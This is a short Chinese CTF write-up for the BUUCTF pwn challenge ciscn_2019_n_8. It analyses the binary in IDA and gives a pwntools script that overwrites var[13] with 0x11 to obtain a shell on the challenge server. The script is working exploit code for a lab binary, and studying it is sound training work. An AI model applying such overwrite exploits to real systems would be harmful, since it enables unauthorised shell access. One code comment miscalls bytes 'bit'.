当前位置:网站首页>buuctf pwn ciscn_2019_n_8

buuctf pwn ciscn_2019_n_8

2022-06-21 22:22:00 [mzq]

ciscn_2019_n_8

在这里插入图片描述

checksec 看一下基本信息

在这里插入图片描述
把程序拖到ida32分析一波,可以看到 scanf 读入字符串给了 var 然后后面的v4,v5没起作用,然后判断了var[13]是不是等于\x11,是就给一个shell
在这里插入图片描述
所以只要让我们输入的字符后13位等于 \x11

from pwn import *

io = process("./ciscn_2019_n_8")
io = remote("node4.buuoj.cn",29622)
context(log_level="debug",arch="i386")

payload = flat(["aaaa"*13,0x11]) # 因为32为是4个bit 所以说4个a 

io.sendline(payload)
io.interactive()

在这里插入图片描述

原网站

版权声明
本文为[[mzq]]所创,转载请带上原文链接,感谢
https://blog.csdn.net/zip471642048/article/details/125393899